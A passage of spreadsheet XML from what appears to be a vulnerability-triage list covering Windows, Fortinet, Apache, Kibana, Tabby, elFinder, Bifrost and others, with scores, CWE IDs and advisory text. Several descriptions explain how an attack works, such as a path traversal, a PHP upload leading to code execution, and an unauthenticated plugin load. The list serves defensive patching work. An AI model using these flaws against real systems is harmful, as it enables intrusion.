        <is>
          <t>Use after free in Windows Ancillary Function Driver for WinSock allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70342</t>
        </is>
      </c>
    </row>
    <row r="616">
      <c r="A616" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70465</t>
        </is>
      </c>
      <c r="C616" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D616" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E616" s="5" t="inlineStr"/>
      <c r="F616" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G616" s="5" t="inlineStr">
        <is>
          <t>windows, fortinet</t>
        </is>
      </c>
      <c r="H616" s="5" t="inlineStr">
        <is>
          <t>fortinet:forticlient</t>
        </is>
      </c>
      <c r="I616" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J616" s="5" t="inlineStr"/>
      <c r="K616" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L616" s="5" t="inlineStr">
        <is>
          <t>A buffer copy without checking size of input ('classic buffer overflow') vulnerability in Fortinet FortiClientWindows 7.4.0 through 7.4.3, FortiClientWindows 7.2.0 through 7.2.11 may allow an unauthenticated attacker in a position to alter or craft DNS responses to the targeted host to execute arbitrary code via malicious packets.</t>
        </is>
      </c>
      <c r="M616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70465</t>
        </is>
      </c>
    </row>
    <row r="617">
      <c r="A617" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70468</t>
        </is>
      </c>
      <c r="C617" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D617" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E617" s="5" t="inlineStr"/>
      <c r="F617" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G617" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H617" s="5" t="inlineStr">
        <is>
          <t>fortinet:fortimanager, fortinet:fortimanager_cloud</t>
        </is>
      </c>
      <c r="I617" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J617" s="5" t="inlineStr"/>
      <c r="K617" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L617" s="5" t="inlineStr">
        <is>
          <t>A authentication bypass using an alternate path or channel vulnerability in Fortinet FortiManager 7.6.1, FortiManager 7.4.3 through 7.4.5, FortiManager 7.2.5 through 7.2.9, FortiManager Cloud 7.6.1, FortiManager Cloud 7.4.3 through 7.4.5, FortiManager Cloud 7.2.5 through 7.2.9 may allow attacker to improper access control via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70468</t>
        </is>
      </c>
    </row>
    <row r="618">
      <c r="A618" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70563</t>
        </is>
      </c>
      <c r="C618" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D618" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E618" s="5" t="inlineStr"/>
      <c r="F618" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G618" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H618" s="5" t="inlineStr"/>
      <c r="I618" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J618" s="5" t="inlineStr"/>
      <c r="K618" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L618" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Shell allows an unauthorized attacker to perform spoofing over a network.</t>
        </is>
      </c>
      <c r="M618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70563</t>
        </is>
      </c>
    </row>
    <row r="619">
      <c r="A619" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71407</t>
        </is>
      </c>
      <c r="C619" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D619" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E619" s="5" t="inlineStr"/>
      <c r="F619" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G619" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H619" s="5" t="inlineStr">
        <is>
          <t>fortinet:fortios</t>
        </is>
      </c>
      <c r="I619" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J619" s="5" t="inlineStr"/>
      <c r="K619" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L619" s="5" t="inlineStr">
        <is>
          <t>A Stack-based Buffer Overflow vulnerability [CWE-121] vulnerability in Fortinet FortiOS 7.6.1 through 7.6.6 may allow an unauthenticated attacker who can bypass stack protection and ASLR to execute arbitrary code or commands in the context of the WAD daemon via crafted sockets, only if the explicit proxy is configured with Kerberos authentication and SOCKS enabled.</t>
        </is>
      </c>
      <c r="M619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71407</t>
        </is>
      </c>
    </row>
    <row r="620">
      <c r="A620" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72903</t>
        </is>
      </c>
      <c r="C620" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D620" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E620" s="5" t="inlineStr"/>
      <c r="F620" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G620" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H620" s="5" t="inlineStr"/>
      <c r="I620" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J620" s="5" t="inlineStr"/>
      <c r="K620" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L620" s="5" t="inlineStr">
        <is>
          <t>Tabby (formerly Terminus) is a highly configurable terminal emulator. Prior to 1.0.235, a malicious SFTP server can return a backslash traversal filename through entry.name. In tabby-ssh/src/session/sftp.ts, SFTPSession.readdir() and _makeFile() use POSIX path processing that preserves the backslashes as ordinary filename characters. In tabby-ssh/src/components/sftpPanel.component.ts, downloadFolderRecursive() propagates item.name into the local relative path. In tabby-electron/src/services/platform.service.ts, ElectronDirectoryDownload.createFile() passes that path to Windows-native path.join(), and in tabby-electron/src/sftpContextMenu.ts, EditSFTPContextMenu.edit() passes item.name to path.join() for the temporary edit path. Windows interprets the preserved backslashes and parent-directory components as traversal, allowing attacker-controlled content to be created or overwritten outside the selected download directory or temporary edit directory. This issue is fixed in version 1.0.235.</t>
        </is>
      </c>
      <c r="M620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72903</t>
        </is>
      </c>
    </row>
    <row r="621">
      <c r="A621" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72936</t>
        </is>
      </c>
      <c r="C621" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D621" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E621" s="5" t="inlineStr"/>
      <c r="F621" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G621" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H621" s="5" t="inlineStr"/>
      <c r="I621" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J621" s="5" t="inlineStr"/>
      <c r="K621" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L621" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows SMB Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72936</t>
        </is>
      </c>
    </row>
    <row r="622">
      <c r="A622" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72987</t>
        </is>
      </c>
      <c r="C622" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D622" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E622" s="5" t="inlineStr"/>
      <c r="F622" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G622" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H622" s="5" t="inlineStr"/>
      <c r="I622" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J622" s="5" t="inlineStr"/>
      <c r="K622" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L622" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72987</t>
        </is>
      </c>
    </row>
    <row r="623">
      <c r="A623" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73334</t>
        </is>
      </c>
      <c r="C623" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D623" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E623" s="5" t="inlineStr"/>
      <c r="F623" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G623" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H623" s="5" t="inlineStr">
        <is>
          <t>apache:parquet</t>
        </is>
      </c>
      <c r="I623" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J623" s="5" t="inlineStr"/>
      <c r="K623" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L623" s="5" t="inlineStr">
        <is>
          <t>Potential problem for users of the org.apache.parquet.crypto.keytools package in Apache Parquet, versions 1.12 to 1.18. 
This package enables users to encrypt Parquet files via an envelope encryption mechanism that wraps (encrypts) data keys via a Key Management Service (KMS). 
On the reader side, the KMS URL can be application-controlled or file-controlled.
If the user does not leverage application control for this parameter, a file-controlled KMS URL is forwarded to a pluggable KmsClient implementation. 
If the pluggable implementation does not perform host validation, a KMS token can be sent to a malicious host set by an attacker in the file.
Before the problem is fixed, users are recommended to leverage application control for KMS URL parameter in readers (versions 1.12-1.18).
After the problem is fixed (presumably in version 1.19), the upgrade will disable file-controlled KMS URL by default. Users of the KMS URL parameter 
will have two options then: leverage application control for KMS URL parameter in readers, or enable file-controlled KMS URL (via a new app parameter).
The latter option will explicitly require (in the new parameter documentation) to validate the KMS URL and use authentication in the custom implementation of the KMS client plug in.</t>
        </is>
      </c>
      <c r="M623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73334</t>
        </is>
      </c>
    </row>
    <row r="624">
      <c r="A624" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75021</t>
        </is>
      </c>
      <c r="C624" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D624" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E624" s="5" t="inlineStr"/>
      <c r="F624" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G624" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H624" s="5" t="inlineStr"/>
      <c r="I624" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J624" s="5" t="inlineStr"/>
      <c r="K624" s="5" t="inlineStr">
        <is>
          <t>CWE-1327</t>
        </is>
      </c>
      <c r="L624" s="5" t="inlineStr">
        <is>
          <t>fastify-cli starts the Node.js Inspector when a debug flag is used, but it ignores the explicit bind address the user supplies and binds the Inspector to a broadly reachable address instead of the intended loopback. As a result the debugging interface can be exposed beyond the local machine, and because the Inspector protocol allows arbitrary code evaluation, a remote party that reaches it can achieve remote code execution on the developer's machine. This affects fastify-cli from 1.5.0 up to 8.0.1. Users should upgrade to fastify-cli 8.0.1, which honors the configured Inspector bind address.</t>
        </is>
      </c>
      <c r="M624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75021</t>
        </is>
      </c>
    </row>
    <row r="625">
      <c r="A625" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78444</t>
        </is>
      </c>
      <c r="C625" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D625" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E625" s="5" t="inlineStr"/>
      <c r="F625" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G625" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H625" s="5" t="inlineStr"/>
      <c r="I625" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J625" s="5" t="inlineStr"/>
      <c r="K625" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L625" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Failover Cluster allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78444</t>
        </is>
      </c>
    </row>
    <row r="626">
      <c r="A626" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78583</t>
        </is>
      </c>
      <c r="C626" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D626" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E626" s="5" t="inlineStr"/>
      <c r="F626" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G626" s="5" t="inlineStr">
        <is>
          <t>elasticsearch</t>
        </is>
      </c>
      <c r="H626" s="5" t="inlineStr">
        <is>
          <t>elastic:kibana</t>
        </is>
      </c>
      <c r="I626" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J626" s="5" t="inlineStr"/>
      <c r="K626" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L626" s="5" t="inlineStr">
        <is>
          <t>Incorrect Authorization (CWE-863) in Kibana can lead to privilege escalation via Input Data Manipulation (CAPEC-153). Elasticsearch cluster privilege declarations originating from integration packages were not validated before being used to mint credentials for enrolled Elastic Agents. A user holding Fleet management privileges could therefore cause every Elastic Agent on a targeted policy to receive a credential carrying arbitrarily elevated Elasticsearch cluster privileges, up to and including full cluster administration.</t>
        </is>
      </c>
      <c r="M626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78583</t>
        </is>
      </c>
    </row>
    <row r="627">
      <c r="A627" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78626</t>
        </is>
      </c>
      <c r="C627" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D627" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E627" s="5" t="inlineStr"/>
      <c r="F627" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G627" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H627" s="5" t="inlineStr"/>
      <c r="I627" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J627" s="5" t="inlineStr"/>
      <c r="K627" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L627" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="M627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78626</t>
        </is>
      </c>
    </row>
    <row r="628">
      <c r="A628" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80354</t>
        </is>
      </c>
      <c r="C628" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D628" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E628" s="5" t="inlineStr"/>
      <c r="F628" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G628" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H628" s="5" t="inlineStr"/>
      <c r="I628" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J628" s="5" t="inlineStr"/>
      <c r="K628" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L628" s="5" t="inlineStr">
        <is>
          <t>Authorization bypass through User-Controlled key vulnerability in Apache Camel K.
An authorization vulnerability in custom resource resolution allows a tenant to reference secrets by name in the operator namespace, potentially exposing secrets belonging to other tenants or operator components.
This issue affects Apache Camel K: from 2.0.0 before 2.9.3, from 2.10.1 before 2.10.2.
Users are recommended to upgrade to version 2.9.3, 2.10.2 or 2.11.0, which fixes the issue.</t>
        </is>
      </c>
      <c r="M628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80354</t>
        </is>
      </c>
    </row>
    <row r="629">
      <c r="A629" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81268</t>
        </is>
      </c>
      <c r="C629" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D629" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E629" s="5" t="inlineStr"/>
      <c r="F629" s="5" t="inlineStr"/>
      <c r="G629" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H629" s="5" t="inlineStr"/>
      <c r="I629" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J629" s="5" t="inlineStr"/>
      <c r="K629" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="L629" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to execute flows and obtain sensitive information due to insufficient session expiration of API keys after user deactivation.</t>
        </is>
      </c>
      <c r="M629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81268</t>
        </is>
      </c>
    </row>
    <row r="630">
      <c r="A630" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81891</t>
        </is>
      </c>
      <c r="C630" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D630" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E630" s="5" t="inlineStr"/>
      <c r="F630" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G630" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H630" s="5" t="inlineStr"/>
      <c r="I630" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J630" s="5" t="inlineStr"/>
      <c r="K630" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L630" s="5" t="inlineStr">
        <is>
          <t>elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Prior to 2.1.70, checkExtractItems() in php/elFinderVolumeDriver.class.php calls mimetypeInternalDetect() without passing the result through mimeTypeNormalize(). Because the .phtml, .phar, .php5, and .php3 extensions are absent from mime.types, the staticMimeMap entries that map them to text/x-php are not applied, and allowPutMime() permits extraction even when uploadDeny blocks text/x-php. An attacker with ZIP upload permission can extract PHP-executable files into a web-accessible files/ directory and achieve remote code execution when the server executes those extensions. This issue is fixed in version 2.1.70.</t>
        </is>
      </c>
      <c r="M630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81891</t>
        </is>
      </c>
    </row>
    <row r="631">
      <c r="A631" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83997</t>
        </is>
      </c>
      <c r="C631" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D631" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E631" s="5" t="inlineStr"/>
      <c r="F631" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G631" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H631" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I631" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J631" s="5" t="inlineStr"/>
      <c r="K631" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L631" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83997</t>
        </is>
      </c>
    </row>
    <row r="632">
      <c r="A632" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84381</t>
        </is>
      </c>
      <c r="C632" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D632" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E632" s="5" t="inlineStr"/>
      <c r="F632" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G632" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H632" s="5" t="inlineStr"/>
      <c r="I632" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J632" s="5" t="inlineStr"/>
      <c r="K632" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="L632" s="5" t="inlineStr">
        <is>
          <t>HTTPX2 is a next generation HTTP client for Python. Prior to 2.10.0, httpcore2 fails to start TLS in src/httpcore2/httpcore2/_sync/socks_proxy.py and src/httpcore2/httpcore2/_async/socks_proxy.py when the remote origin uses wss through a SOCKS5 proxy because the TLS upgrade condition only recognizes https. HTTPX2 exposes the flaw through Client.websocket() and AsyncClient.websocket() from 2.6.0 through 2.9.1, so the opening handshake, query parameters, Authorization headers, cookies, and subsequent frames can cross the proxy path in plaintext without certificate verification. An attacker controlling or observing that path can read or modify traffic and impersonate the WebSocket server. This issue is fixed in httpcore2 2.10.0 and HTTPX2 2.10.0.</t>
        </is>
      </c>
      <c r="M632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84381</t>
        </is>
      </c>
    </row>
    <row r="633">
      <c r="A633" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84393</t>
        </is>
      </c>
      <c r="C633" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D633" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E633" s="5" t="inlineStr"/>
      <c r="F633" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G633" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="H633" s="5" t="inlineStr"/>
      <c r="I633" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J633" s="5" t="inlineStr"/>
      <c r="K633" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="L633" s="5" t="inlineStr">
        <is>
          <t>A improper validation of certificate with host mismatch vulnerability in Fortinet FortiOS 7.6.1 through 7.6.6, FortiProxy 7.6.2 through 7.6.6 may allow attacker to information disclosure via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84393</t>
        </is>
      </c>
    </row>
    <row r="634">
      <c r="A634" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86242</t>
        </is>
      </c>
      <c r="C634" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D634" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E634" s="5" t="inlineStr"/>
      <c r="F634" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G634" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H634" s="5" t="inlineStr"/>
      <c r="I634" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J634" s="5" t="inlineStr"/>
      <c r="K634" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-306, CWE-94</t>
        </is>
      </c>
      <c r="L634" s="5" t="inlineStr">
        <is>
          <t>Bifrost HTTP transport before 2.0.0 accepts an enabled custom plugin whose path is an HTTP URL through unauthenticated POST /api/plugins when management authentication is disabled (the default, governance.auth_config.is_enabled=false). The shared-object loader treats an http-prefixed path as a download URL, writes the body to a temporary .so, and passes it to Go's plugin.Open. After a successful open, optional Init runs immediately with the supplied config as the Bifrost process user. On documented dynamically linked builds (DYNAMIC=1 / no static-link flags), which the vendor requires for custom Go plugins, plugin.Open is expected to succeed and this is unauthenticated remote code execution. On the published statically linked Docker image, plugin.Open fails with Dynamic loading not supported, so that build class is only server-side request forgery. Attack complexity is High because the attacker cannot force RCE on the default static image and a loadable plugin must match the host Go version, OS, architecture, and linkage. The 1.6.x HTTP transport line through 1.6.11 does not contain the fix.</t>
        </is>
      </c>
      <c r="M634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86242</t>
        </is>
      </c>
    </row>
    <row r="635">
      <c r="A635" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87016</t>
        </is>
      </c>
      <c r="C635" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D635" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E635" s="5" t="inlineStr"/>
      <c r="F635" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G635" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H635" s="5" t="inlineStr"/>
      <c r="I635" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J635" s="5" t="inlineStr"/>
      <c r="K635" s="5" t="inlineStr">
        <is>
          <t>CWE-155, CWE-287</t>
        </is>
      </c>
      <c r="L635"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M635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87016</t>
        </is>
      </c>
    </row>
    <row r="636">
      <c r="A636" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87457</t>
        </is>
      </c>
      <c r="C636" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D636" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E636" s="5" t="inlineStr"/>
      <c r="F636" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G636" s="5" t="inlineStr">
        <is>
